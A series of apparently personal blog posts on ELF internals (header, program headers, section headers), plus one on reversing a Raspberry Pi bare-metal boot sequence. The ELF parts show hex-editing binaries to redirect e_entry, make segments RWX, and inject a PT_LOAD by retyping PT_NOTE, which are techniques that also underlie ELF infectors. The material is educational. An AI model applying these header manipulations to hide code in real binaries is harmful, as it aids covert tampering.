More directly perhaps in the science of computer hacking, because we often work in the realms governed by (or are inevitably always governed by) the capability of computer languages (which themselves are governed by the relations between sets, their labels and sizes); some have realized that our greatest pains and harshest challenges come often straight from underestimating the way languages work when they are allowed to be spoken with their broken, inconsistent and superstructure referencing parts (every language is an expression of a "base" or "host" language that usually has different and more powerful capabilities than its "guest" - in computer science we discern the power of these languages by their computational capabilities).

Just to cleanly connect my points here - one language is the "bigger", around or hosting another language by the size of its computational power and because of the references possible from its "hosting" or subset and computationally smaller languages i.e what it can possibly compute under certain proofs when using those small languages in these contexts. Sometimes they lend "subsets" of this power to isolated subsets of their literal symbols: for instance have a "language" "within" JavaScript for setting variable values and another "within" JavaScript for part controlling execution flow, could for instance a variable setting be allowed to become an if statement or equivalently a control of execution flow? Of course! Its JavaScript! Just stick the variable value in an eval call ;)

So through these languages we can directly speak (strings and other input data) we make reference to outer more powerful structures that appear within languages themselves (or more generally are "equivalently" in the languages themselves - I leave space for category theory and input fuzzing to argue what is the "Set" and therefore what is "in" it as well), that also impose or allow power over their ordering and labeling and effective interpretation. We say that these spirits called "weird machines" arise from learning what we can summon in apparent or seeming "non-weird machines" by giving execution and interpretation to the aspects of a language that are built in the "intersections" between other languages. Quick example relevant here is to say; if you can make string input to a program also impose meaning (ordering or labeling properties) on the stack layout (regardless of how); namely the string is both character data and stack address data, it exposes an intersection of two languages which gives life to the string data in an unusual but powerful way - it is not just displayable but also executable!

Anyway sorry for the philosophical rant - on with the section meta-data mangling! </side-rant>

Introduction to the ELF File Format (Part III) : The Section Headers

2018-09-25T23:42:00.001-07:00

Hi folks! This post is part of a series I'm covering on the ELF format. In this one I'm going to discuss the section headers and unpack how they work.

So far we have:

Introduction to the ELF File Format : The ELF Header (Part I)
Introduction to the ELF File Format Part II : Program Headers (I know the naming is confusing, totally didn't play this out that well but I'll keep it consistent from here on out ;)
This

I know its a super long list right? But is going to get a bunch more entries very soon. In this one I'm going to cover the rest of the fields I skipped in the first section, unpack how section headers work and I thought I'd drop a nice illustration of the format as well. Enjoy!

e_flags field and the rest

This header field can contain a number of architecture specific values and sometimes indicate things about the ABI as well. Each architecture defines its own weird set of values for these and they basically mark the ELF with certain attributes, mostly involving whether it makes use of extensions or special code formats. Here's the example for MIPS:

from https://dmz-portal.mips.com/wiki/MIPS_ELF_header_definitions

As you can see pretty boring stuff, there's also special fields for ARM and SPARC and should be for all the other architectures ELFs can run on (they just aren't as easy to find as an example as those two lol).

e_shstrndx

This field holds the index of the.shstrtab, in the section header table. This section is merely an array of names for sections (used by readelf as well) providing some semantics for interpretation. This array is delimited by null values.

To make sure we know how it works for sure here's a quick diagram showing how this section works:

As you can see, in the header value dump from readelf, the index number is listed as 28. The next image shows a dump of the section header table also from readelf -S. We're focused in on entry 28 which is called the .shstrtab. The last frame shows an honest hexdump of the file confirming these theories, offset 0x18f4 contains the start of the ascii data that programs like ld and readelf deference as the names of the sections.

Okay that's the ELF header finally done and dusted. Lets check out how section headers work.

Section Headers

Finally time to explain the section headers. They serve almost purely to tag areas of the file with semantic information so other files can find symbols, debug information, meta-data about sections themselves and much much more. Here are the ELF header fields that hold information about the section header table:

e_shoff - file offset where the section headers start
e_shnum - number of entries in the
e_shentsize - the size of entries in the section header table

These are pretty straight forward as you can see they just allow the ELF interpreters to aim at the start of the table and logically limit the size of entries. Each section header table entry itself has a couple of properties to it. Sections have types, related sections that hold meta-data, and names! Here's what the ELF standard defines as section attributes:

sh_name - the index of .strtab that contains the section name
sh_type - the section type (SHT_NULL, SHT_DYN,...)
sh_flags - the memory attributes of this section during execution (SHF_WRITE, SHF_ALLOC,...)
sh_addr - the address in the file where this section starts
sh_size - the size in bytes this section occupies
sh_link - associates a section to this one, field value can depend on sh_type
sh_addralign - memory alignment value for this section
sh_entsize - the size of the entry in bytes.

These fields have a number of sub-fields so I've sketched some of them out to give you a kind of cheat sheet over view:

The sh_link field associates this section to another in order to provide important meta-data for its function. So for instance if a section requires a list of other strings to make sense of this field will contain the index of the section that contains that data.

A good analogy would be if the section is about lets say a list of pokemon cards you might need a section to define pokemon card types or hold the name values for the cards in this case sh_link would point to the section that contains this data. So it allows sections to support one another in function.

We can see examples of this in the functionality of sections like the .rela.plt or .dynsym (list of dynamic symbols and their properties) which probably needs to know where the dynamic symbol names are so therefore would contain some sh_link value that would prove helpful in this sense.

Here's how it looks when readelf interprets this - with some helpful annotation of course:

I hope that makes it clear what that field is for. It just provides a pointer to another section header with some important associated information. Its pretty much the same story for the sh_info field, here's what the section header table looks like when its labelled to reflect the sh_info field references:

Its no surprise the .dynsym points to the .interp section. .interp holds the path name of the interpreter. The interpreter is after all the program in charge of making sense of the symbol table and function relocation.

You might be interested in in knowing how this looks in hexdump, so here you go (with nice labels too!):

As you can see the .shstrtab really is used to deference the names of the sections. In the raw format, the 0x1b is the index in .shstrtab where the name of .interp is saved. We can now see that readelf actually fetches this for us and prints out the nice fancy name.

We can move on to unpacking how the symbol and library resolution works. Stay Tuned!

References and Reading

Introduction to the ELF Format Part II : Understanding Program Headers

2018-09-14T00:20:00.001-07:00

Welcome back folks! In the previous post I covered pretty much the most trivial parts of the ELF file format. In this post we are actually going to work with one of the most interesting mechanisms in the file - the program headers! I skipped some parts of the ELF header in the previous post and decided to cover them here specifically because they inform on the Program Headers anyway. Lets get started!

Introduction : What are Program Headers?

I mentioned in part 1 that the ELF format performs two tasks. A recipe for how to sublimate dead files into living processes and adds the bells and whistles needed to make the file look pretty to gdb, the dynamic loader and a bunch of other tools. Program Headers (among other functions) are more often for telling the memory loader where to put stuff. It also has some house keeping functions.

We'll get into how these memory loading powers and formats work a little later for now its just important to keep in mind a good idea of what to expect in terms of the purpose of these fields.

ELF Header continued

The ELF header covered in the previous post holds some fields specific to the program headers these are the:

e_phoff - indicates the offset in the file where the start of the program headers (technically speaking this "needs" to always point to a PHDR section but that's not entirely true - stay tuned!)
e_phentsize - indicates the byte size of program header entries
e_phnum - indicates the number of program header entries

One can imagine that the way these functions are used is probably to help logically limit traversal of the headers.
Lets take a look at what program headers look like in some raw hex:

I had to block out part of my terminal when I made this because i sometimes run a .bashrc that displays some network stuff in my terminal prompt.

If you want to check out the program headers for an elf file these are the magic commands you need:

readelf -l ./compile.elf

As a fun experiment we can play with the e_phoff field to make the program skip some of the program headers. Right now the program headers are shown to start at 0x40 which is 64 bytes into the file - usually they will start there right after the ELF header, but there's no strict reason they need to! Lets see what happens if we shift the e_phoff address down one program header.

So the first program header appears at 0x40, the next one (The INTERP section) at 0x78, which is exactly 0x38 = 56 bytes down from the start of the program headers; as indicated by the e_phentsize field in the ELF header.

Editing the raw binary so that e_phoff points to 0x78 results in this readelf output:

You might wonder if this ELF without its PHDR program header still runs? YES! No one cares about your PHDR program header!

There are a number of types of program headers. Each of them with a different purpose:

0x00000006 PHDR - Indicates the beginning of the program header table itself. This section according to documentation requires a loadable segment entry, but here we see that it being proceeded with PT_INTERP means this is not true! More than that its not even needed for the ELF to run (according to the sample I'm using here! Of course you may be running on a system or architecture that actually takes this field seriously).
0x00000003 PT_INTERP - this section indicates the program path name that will be invoked as the interpreter of the ELF should it be an executable. It of course will be ignored if the ELF is not executable. You can try pointing this to other programs to see what happens :)
0x00000001 PT_LOAD - the most important program header type. Defines how a portion of the file that must be placed in memory. This leverages the other attributes of the program header and changes their meaning slightly because they appear in this context (see below how p_vaddr, p_paddr etc are explained in in the context of PT_LOAD)

The PT_INTERP is a little strange in that it points to an offset in the file especially for holding a string is the file path of the program meant to interpret the file (this is why ours points to ld-linux the "loader dynamic" ).

Here's what this actually looks like in the raw hex:

There are a number of other program header types, I've only expanded on a couple of the most important ones for this post. Its best to check out the documentation if you want to grasp the full p_type range of values.

Other than this, the program header format has a few more attributes, these are important to understand if you're going to pull off the PT_LOAD wizardy later on in the post.

p_offset - the offset into the ELF file where this segments content is defined later on we will point this value to different places.
p_vaddr - the virtual address that this segment will be mapped to, should it be mapped into memory (again this only really applies to PT_LOAD type headers)
p_paddr - the physical address the segment will be mapped to should the OS running this use a memory loader standard that wants straight up physical address targeting.
p_filesz - this is the size of the segment in the file, basically tells the loader how many bytes to suck out of the ELF.
p_memsz - this is the size of the segment in memory, some portions of the process image may want of course a different in memory size to be able to host expansion or dynamic usage perhaps.
p_flags - the permissions under which this field will be mapped (should it be mapped into memory)
p_align - This field is to make sure the segments when mapped in are aligned to memory properly. For a proper explanation please see the documentation.

So just to recap, each program header has these p_* fields but whether the p_type is PT_LOAD or not decides whether the content described by the program header will actually end up as part of the memory image. The emphasis in the above sentence is because sometimes (due to the chunk based loading style of the kernel) the entire header table can end up in memory.

Anyway moving on, we should for interests sake fiddle with some p_type values and see what happens.

If we throw some crazy bytes at the program header type field readelf spits out some interesting stuff:

There are a couple more types to explore, some of which can sometimes be neat places to stuff things you need during an exploit. Either way its great to get to know the full set of behaviors the file is capable of - this way we can learn to describe more epic exploits with it!

Okay so PT_LOAD commands must be pretty interesting to mess around with so lets get that going next.

PT_LOAD commands

PT_LOAD commands as covered above, tell the loader where to stick what, with which permissions. Lets try something simple that will not immediately affect execution, but allow us to see the effect of our influence on the file. A good idea for this would be flipping some bits in the segment p_flags field.
They are pretty easy to spot in raw hex, here's me flipping the permissions on a PT_LOAD segment to full exec, read and write these permissions are defined according to popular linux standards 0x01 exec, 0x4 for read, etc (please see documentation for the full spec) we are going to give it the value 0x07:

If we're going to understand how things end up in memory from the interpretation of the ELF file we need to confirm our projections by looking at actual memory.

This is a pretty easy thing to do in linux the /proc/[PID]/maps device spits out the current memory map (which will show you a good summary of where things are, what permissions they have etc etc), in addition we can fiddle with some PT_LOAD commands and then scratch in the processes memory using gdb. Here's the general methodology to testing PT_LOAD options and confirm them:

Mangle the headers as above
Open the file in gdb using `gdb ./compile_me.elf`
Set a break point for _start , it should still execute _start since all this involves is pointing the rip there once the program is loaded and uhm well, letting it RIP!
Once the break point triggers we ask gdb what the process id is
using the process id from Step 4 we can look up the memory map using the /proc/PID/maps device

The following screenshot shows how this is done:

And there you have it the memory is actually mapped with this crazy full perm setting!

Redirecting PT_LOADs

Okay so we can definitely change permissions but can we say change the address of a section in the actual memory image? Sure! Here's me doing that:

hexedit the the p_vaddr of the first PT_LOAD segment in the ELF file
open the binary in gdb
break point on _start
pop open the memory map

You should be able to see something like this:

Of course this doesn't really execute it kind of dies just after _start gets executed:

We can also inject an extra PT_LOAD command. To inject another load command an easy way is to just rewrite the type of another section. Try using the PT_NOTE segment, they are pretty much ignored for our purposes. So here's me retyping the PT_NOTE to be an injected PT_LOAD:

This runs perfectly! Here's me confirming this in gdb, I've also included the live memory map:

And that's it for this one! I'm sure you folks can figure out more interesting games to play with the program headers in the next post I'm going to start covering the Section headers. Stay Tuned!

References and Reading:

https://en.wikipedia.org/wiki/Executable_and_Linkable_Format

Introduction to the ELF Format : The ELF Header (Part I)

2018-09-12T23:01:00.000-07:00

ELF Files are charged with using their magic to perform two holy tasks in the linux universe. The first being to tell the kernel where to place stuff in memory from the ELF file on disk as well as providing ways to invoke the dynamic loaders functions and maybe even help out with some debugging information. Essentially speaking its telling the kernel where to put it in memory and also the plethora of tools that interpret the file where all the data structures are that hold useful information for making sense of the file. Anyway that's as far as I've figured it out - the actual break down is a little less simple.

I'll demonstrate why this is so here and over the next series of posts in the classic "Learn things by breaking them" style.

ELF Header and Identification fields

The first thing that appears in an ELF file is of course the header, which is like most things in file formats just a list of offsets in the file. Its purpose is to indicate essentially what kind of ELF this is and where the various interpreters of the file can find the good stuff.

Here's what the header looks like (I've included a sample here, you can grab any ELF file on the system):

If you're not super used to the linuxy world, please don't pay strong attention to the .elf extension to my file normally ELF files do not have extensions to their file names.

The first field is called the ELF Identification. The ELF format is pretty flexible in that this same format can run on a ton of different architectures, with support for multiple encoding and Application Binary Interfaces. Here's the break down on how the EI_IDENT field works :

Offset 0x00 - 0x03 EI_MAG0 ... EL_MAG3 First for bytes of every ELF file are the ascii codes for 'E' 'L' 'F'.
Offset 0x04 EI_CLASS basically tells us whether the file is 32 or 64 bit. Standard says 0x1 means 32 bit and 0x2 means 64 bit.
Offset 0x05 EI_DATA defines the endianness of the file 0x01 means little endian and 0x02 means big endian.
Offset 0x06 EI_VERSION shows the version of the ELF file, most should be set to 0x1 for version 1.
Offset 0x07 EI_OSABI shows the OS Application Binary Interface (ABI) extensions to the ELF file being enabled. Please bare in mind the documentation is a bit flakey here and may depend heavily on the interpretation of the particular OSABI involved sometimes.

One can see what the EI_IDENT field says by looking at the output of readelf -h.

Pretty interesting stuff!

Lets see what happens when we change the value of the ELF version number, pop open hexedit and change offset 0x06 in the file to whatever you want, then run readelf -h on it. Here's what happens when I do this:

ELF Type, Machine and Version Fields

The next file after the e_ident file is the e_type. In the example above I claim that the type is one of EXEC (since it reads 0x02 0x00) - which according to the ELF standard means its meant to be executed (checking the standard will confirm this).

Lets dump the header of what it is probably a shared object and compare the parameters for the e_type field for instance. Here's the header for libvlc:

Yup looks like the byte offsets agree!

This one has the field for e_type set to the bytes 0x03 0x00 at offset 0x10 in the file header - this means its an ELF type of DYN which means its definitely a shared object. And here's read elf confirming this information:

After the type field we find the e_machine specification for the file which can have a number of settings each indicating the architecture this file is meant for. Again ELF supports a number of architectures so there's a range of values this can take. Might be a good idea to fiddle with this field and see what happens.
Here's some examples I found that don't appear in normal documentation:

Always good to throw a couple bytes at the format and see what it really does! Moving on the next field is the e_version which also indicates the ELF version number, which should as the byte field in the EI_IDENT field. You can pretty much set this to anything and it should still run:

The next field is one of the most important so I thought I would pop it in its own section and show you how to fiddle with it in a way that confirms its behavior.

The e_entry field

The e_entry field lists the offset in the file where the program should start executing.Normally it points to your _start method (of course if you compiled it with the usual stuff). You can point the e_entry anywhere you like, as an example I'm going to show that you can call a function that would other wise be impossible under normal execution. To start here's the C program and the Make file I'm using:

As you can see the never_call function never does get called in the main method. And when you run it the following happens:

Now lets see if we can make the e_entry point to the never_call method. To do that we need to get the following done:

Look up the virtual address of the never_call function with objdump
Stick the virtual address in the e_entry field
Run the binary confirm the output

Here's how you look up the address of the never_call function. Run objdump -D compile_me.elf and look for the never_call function. Alternatively you could try objdump -D compile_me.elf | grep never_call.

In my example the never_call is at address 0x400526.

If you've injected the address correctly readelf -h ./compile_me.elf should show the following:

and when you run it you should see...

That's it for this post folks in Part II I'll cover the rest of the ELF header and do some weird stuff with PT_LOAD commands. Stay Tuned!

References and Reading

Reversing a bare bones Raspberry Pi Kernel : Branching To the Kernel

2018-07-15T00:45:00.000-07:00

I lost the first version of this post because of problem in blogger's auto-save function.

Anyway so if you want to get your own raspberry pi os kernel going, I share some cool posts on that in here and expand on them by unpacking some of the assembler code essentially reverse engineering it or "unrolling" the os.

Setting up your Development Environment

I think the explanation of the 'Roll your own Rapsberry Pi Os' at https://jsandler18.github.io/ pretty much sorts this out I can at least do the favor of confirming that this persons advice definitely does the job so check it out. The post also discusses the background of why we need certain files in the project for instance like the linker scripts and kernel.c files. As a short summary here's the basic work flow:

1 - Write a linker script

This is to make sure the compiler can recombined the boot.S and kernel.c parts

2 - Write a boot.S

This file is to initialize the run time for your kernel and branch into it.

3 - Write a kernel.c

This is the actual kernel, we will be using the C run time. Mine looks like this:

4 - Compile boot.S, kernel.c

To get some object files

5 - link the objects and run your kernel

Once you've compiled and launched your own kernel a couple times you might want to try to reverse engineer it to make sure you know it at all its levels of existence as software.

Lets get started!

Reverse engineering a basic ARM bootloader

Of course in order to get hold of the assmbly code for your kernel you need to invoke the cross compiled objdump on your kernel image like so:

So the first thing we do in the boot.S file is define a couple labels and import some as well you don't need to worry too much about these but they are pretty standard linking stuff. I'm more interested in the instructions being defined in the .start label, and if you haven't guessed it, this code is what gets the ball rolling.

The first thing we see there is this weird instruction:

mrc p15,#0,r1,c0,c0,#5

What this command does is essentially use a special feature that arm has called "coprocessors" they are functions on an ARM boards that extend features like caching, memory management stuff, gpu, etc it depends a little on the hardware folks whats going on with these sometimes. The documentation says the following about the p15 register, which is the one we are invoking using the MRC operation:

The CP15 system registers provide control and status information for the functions implemented in the processor. The main functions of the CP15 system registers are:

Overall system control and configuration.
Memory Management Unit (MMU) configuration and management.
Cache configuration and management.
Virtualization and security.
System performance monitoring.

In order to use these wonderful features we need to invoke the MRC/MCR commands and pass them some arguments and opcodes. The MRC instruction is the following (According to the ARM documentation):

Move to ARM register from coprocessor. Depending on the coprocessor, you might be able to specify various operations in addition.

Which doesn't explain much really, critically it says that this gives access to the coprocessor functions and their functions depend on uhm how they are defined. There's a slightly more helpful Stack overflow post I found here, and it says the following:

MRC stands for "send a command to a coprocessor and get some data back"

So the command and what you get back depends on specific definitions for the co processor. But is meant to service a fetch+do style command basically; do stuff for me and return some information. The command format also needs a little explaining here's how MRC basically works

MRC{cond} coproc, opcode1, Rd, CRn, CRm{, opcode2}

There's a way to conditionally execute this I'm gonna stick to the non-cond for now. The coproccessors are registers p1-15, here's the breakdown on what they all do. For each of them you can do stuff like read property values and set them with mrc by specifying these opcodes1,2 which can be a range of integer values (we will discuss the one used here below). CRn,m specify additional coprocessor registers; again this are defined according to a table below. And most importantly for us the Rd placeholder is for a register to target with this command - our example here targets it in order to save a copy of the Multiprocessor Affinity Register. Our invocation has opcode1 as 0 and opcode2 as 5, so that means this according to the documentation

CRn	Op1	CRm	Op2	Name	Reset	Description
c0	0	c0	0	MIDR	`0x410FC075`	Main ID Register
...
			5	MPIDR	-^[a]	Multiprocessor Affinity Register

At the bottom of the Mulitprocessor Affiinity Register page linked above it give the following example command which looks a lot like what we are dong:

To access the MPIDR, read the CP15 registers with:

MRC p15, 0, <Rt>, c0, c0, 5; Read Multiprocessor Affinity Register

What our code is doing with the Multiprocessor Affinity Register's value is copying it into the r1 , most probably to check that it has a certain setting. The documentation states the following about how the register's value is formatted:

Which says that the CPU ID field looks like this:

[1:0]

CPU ID

Indicates the processor number in the Cortex-A7 MPCore processor. For:

One processor, the CPU ID is 0x0.
Two processors, the CPU IDs are 0x0 and 0x1.
Three processors, the CPU IDs are 0x0, 0x1, and 0x2.
Four processors, the CPU IDs are 0x0, 0x1, 0x2, and 0x3.

Given that the instruction here and's r1 with 3:

It seems that it is checking what the values of the CPU ID are using a bit mask basically. If its not 3 (both bits are on 3 = 11 in binary ) then it halts. Why is it checking if its 3? I think right now this is so that it can make sure its running on one core so it checks the ID to make sure its the last one. Running the code by changing the #3 literal in the boot.S shows that the kernel runs a couple times basically or executes the instructions more than once if you don't make sure you are running on the ID with 3 as the first 2 bits.

To compare different invocations of the mrc and coprocessors its a good idea to scratch around other peoples kernels to see what they are doing with this instruction, here's an example I found on github:

from raspberrypi/boards/cpuid/vector.s

here's what it does with it in a file called cpuid.c file:

Clearly it this is to determine the board type. I'm not delving into too much detail about the specific value we are checking and what it means to find this out I need to dig a little deeper in the board data sheets probably but my jury is out on hard confirmations about what opcode 5 does. None-the-less we can be pretty sure this is to make sure our code runs properly on the right board. Moving on!

Reverse Engineering a basic C run time setup

The next snippet of code looks like this:

The mov sp instruction points the stack address at 0x8000 afaik there's some flexibility in which value you use, but it might also depend on your board type. After that we see a ldr instruction here, this is the definition of this operation according to the documentation:

The LDR pseudo-instruction loads a register with either:

a 32-bit constant value
an address.

- http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0041c/Babbfdih.html

This code is pretty straight forward then; it loads the addresses of where the labels __bss_start and __bss_end are into registers r4 and r9 respectively. It then 0's out the values of registers r5-r8. After all this it issues a b 2f instruction, which means it will branch unconditionally to label 2 and start executing there. We can confirm this by looking at the assembler code for this:

The instruction at 802c reads b 8034 <__start+0x34> shows that it will branch to the cmp r4,r9 instruction which is according to boot.S the first instruction under label 2. After the comparison it does another conditional branch based on whether the two registers are equal or not. If they are it repeats the loop by branching back to _start+0x30 which has this instruction:

stmia r4!,{r5-r8}

The stm instruction stores a set of values constructed from the list registers' values in the braces (here our example is all the registers from r5-r8's a total of 16 bytes). at the address pointed to by the register value specified These register values are written contiguously to the address in memory pointed to by r4. The exclamation suffix means write the final address back to r4. stm has a ia suffix because it will automatically increment r4 after writing to it. This allows us to slam 16 bytes into memory at a time.

Whats happening here may seem odd, but its pretty standard parlance in cleaning out memory sections in order to prep a C run time. Here's some example's from other people's rapsberry pi kernels. This one is also cleaning out the bss, you can see it does some other C/C++ run time prep stuff too:

The code in the section labeled "Initialize the .data section" copies stuff out of memory using a ldrlo instruction which reads 4 bytes from the address [r1] which we can see is initialized as __data_init_start then it stores it to the memory address [r2] immediately after using the strlo operation. Very similar structure to what we are doing. This post called "Building Bare metal ARM systems with GNU" shows some more https://www.embedded.com/design/mcus-processors-and-socs/4026075/Building-Bare-Metal-ARM-Systems-with-GNU-Part-2

Okay so lets say we are done setting up our C runtime, the next thing boot.S does is branch to the kernel like so:

ldr r3,=kernel_main
blx r3

The blx instruction is pretty important it means branch with link exchange and it will transfer control to the kernel's main function.

Reverse Engineering Basic UART I/O initialization

Once it breaks into the kernel it passes it a couple arguments this is the location of the atags structure in memory. I will get into that perhaps in a later post but what I want to focus on here is how the uart_init and kernel main functions look at assembler level.

Here's the kernel main:

Lets break this down. Firs instruction is a push to preserve the r4 and link registers according to the sources I have here this is done because the r4 register holds the atags start address which is passed to the kernel on start. What happens then is the kernel branches immediately to uart_init which looks like this:

Doesn't look like too much of a monster all it does here is essentially shuffle some values around. First instruction puts a 0 into r1 which is being used as a place holder for 0 and clears it for later use as well. The next two instructions constructs the base value for the GPIO reference structure, it does this by first putting 0x1000 in the bottom half of the r3 register value and then using a movt to stick the top 0x3f20 bits in. Here's the documentation on the movt instruction:

Move Top. Writes a 16-bit immediate value to the top halfword of a register, without affecting the bottom halfword.

Syntax

MOVT{cond} Rd, #immed_16

Pretty useful stuff if gives you some flexibility in shuffling around byte values. So it makes r3 hold the value 0x3f201000 which we know from the code is the UART_BASE address:

Then it sets up another offset in the GPIO enum; but this one using r1 (which points to GPIO_BASE via another movt) it moves a value into r2 but I suspect this is only going to make sense later on (lets skip it for now). With those two pointers set up it performs a str instruction using the r0 value which 0, and writing it to r3+0x30 which is UART_CR and if we look at the code again this is exactly what its doing, just setting the memory address pointed to by UART_CR to 0:

Same goes for the r1 str operation of course. We know r1 points to GPIO_BASE, and the str writes to r1+0x94 which is GPPUD.

Okay the rest of the kernel operations are no different to this really they just perform writes to different offsets. I think if you'd like to git gud at reverse engineering these kinds of functions try reversing the rest of the kernel and then looking for some other kernels that do something like this and see if you can reverse engineer out how they do it and where. Have fun!

Reading and references

Bare bones RaspberryPi OS https://wiki.osdev.org/Raspberry_Pi_Bare_Bones
Vector.s https://github.com/dwelch67/raspberrypi/blob/master/boards/cpuid/vectors.s
https://www.techrepublic.com/blog/european-technology/build-your-own-os-using-the-raspberry-pi/
https://jsandler18.github.io/
http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0068b/CIHEEIDJ.html
http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0464e/CHDGECEI.html
http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0360f/CHDGIJFB.html
C0 Main ID Register http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0360f/I65012.html
Load Register Byte http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0802a/LDRB_imm.html
BCM2835 Specifications https://www.raspberrypi.org/documentation/hardware/raspberrypi/bcm2835/README.md
ARM11 Tech reference manual http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0301h/index.html
c0 Coprocessor Registers http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0464f/index.html